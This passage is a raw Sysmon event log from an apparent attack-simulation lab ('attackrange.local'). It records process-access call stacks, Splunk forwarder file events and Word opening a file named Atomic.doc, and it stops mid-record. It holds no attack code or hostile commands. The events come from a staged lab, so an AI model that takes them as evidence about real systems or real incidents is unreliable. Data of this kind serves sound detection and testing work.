12:25:04.231{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292778Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:04.217{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B99057CE784636FF8E90F8B5C20B43E7,SHA256=DB4AB44BE70FFB4288A7569CA0BFF20B2FBCF9CCEB0EB4C7DB23D8BC66227700,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441385Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:05.807{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BF95CFEFF409AF18F10A10A1F78C0A1,SHA256=631B7DC0BBA605AFE657145BA076DD30F756AFD8A42D263C46D610A4F86C927D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441384Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:05.633{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5EA8CC123D156375E1085AC18956A8C,SHA256=32709ED8D3E3D619D0D41E1C8083460EA50494BE663DC657AE8E4C32A56D6126,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292796Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.788{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=137A326E92E1488DB04A170C3C4481A1,SHA256=9EA0D601F96A98F5BD0DB7ED2EA66064E61D5747E54E15324EC529509191CE81,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292795Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.304{BEA10069-D5E0-6086-A001-00000000BB01}59123876C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+4c224|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+4dd30|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+584fe|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+57f5f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+56e48|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292794Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.304{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CFFA29ADD1FBA5E4CB457160C9EF87B,SHA256=87190080E63A0A2D98FFBE3642585834ADDADBA9DDA3AEFD6FDBD224670FAECE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292793Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.304{BEA10069-D5E0-6086-A001-00000000BB01}59123876C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1438C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+73c87|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+7522e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+14519|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+1a430|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+84d6|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+638e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3b280|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3af5e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1015b|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1a277|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+2185f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+ae38|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+a8fb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c 10341000x8000000000000000292792Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.304{BEA10069-D5E0-6086-A001-00000000BB01}59123876C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+2d73e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+16070|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+15184|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+17233|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+1a40c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+84d6|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll+638e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3b280|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+3af5e|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1015b|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll+1a277|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+2185f|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+ae38|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+a8fb|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac 10341000x8000000000000000292791Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.287{BEA10069-D5E0-6086-A001-00000000BB01}59123876C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+976c|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll+9264|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292790Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.266{BEA10069-D0C2-6086-1100-00000000BB01}10121044C:\Windows\System32\svchost.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292789Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.266{BEA10069-D0C2-6086-1100-00000000BB01}10121044C:\Windows\System32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292788Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.266{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292787Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.266{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292786Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.266{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292785Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.266{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292784Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.266{BEA10069-D4AB-6086-4301-00000000BB01}33842096C:\Windows\system32\csrss.exe{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292783Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.266{BEA10069-D4AF-6086-5601-00000000BB01}4365144C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e69f|C:\Windows\System32\windows.storage.dll+16e315|C:\Windows\System32\windows.storage.dll+16de06|C:\Windows\System32\windows.storage.dll+16f278|C:\Windows\System32\windows.storage.dll+16dc2e|C:\Windows\System32\windows.storage.dll+fd025|C:\Windows\System32\windows.storage.dll+fd3a4|C:\Windows\System32\windows.storage.dll+fc9e0|C:\Windows\System32\windows.storage.dll+16650e|C:\Windows\System32\windows.storage.dll+166202|C:\Windows\System32\SHELL32.dll+3f8cd|C:\Windows\System32\SHELL32.dll+3e466|C:\Windows\System32\SHELL32.dll+80201|C:\Windows\System32\SHELL32.dll+6718e|C:\Windows\System32\SHELL32.dll+18d18c|C:\Windows\System32\SHELL32.dll+18cee3|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000292782Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:05.251{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE16.0.13127.21506Microsoft WordMicrosoft OfficeMicrosoft CorporationWinWord.exe"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Administrator\Downloads\Atomic.doc" /o ""C:\Users\Administrator\Downloads\WIN-HOST-96\Administrator{BEA10069-D4AE-6086-06A6-0F0000000000}0xfa6062HighMD5=7851F6195A0306B9BB238309499F79B8,SHA256=8FA3AEBA6758FBFDDDD534936149B351CF767B0E39D74291BC92ED2C271B3C3E,IMPHASH=21DECB0B7EE3F890B1FF9B6C42996CAE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\explorer.exeC:\Windows\Explorer.EXE 354300x8000000000000000292781Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.512{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50644-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000441383Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:05.232{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441382Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:05.232{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441388Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:06.643{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A965DE3F530D3455A8F2249A07169A05,SHA256=80729CB89D86D7CD44CD0273E9CDD3CBC2767691EA7508C91E218DE6D5D241FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292855Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292854Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292853Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+3dbaa2|C:\Windows\System32\windows.storage.dll+3d915b|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+174410|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+173a6a|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1738fc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+175791|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+70dbc|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+12f86d|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b838c|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b81ab|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+b641e|C:\Program Files\Common Files\Microsoft Shared\Office16\mso20win32client.dll+cc358|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292852Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.985{BEA10069-02A1-6088-112A-00000000BB01}65684416C:\Program Files\Microsoft 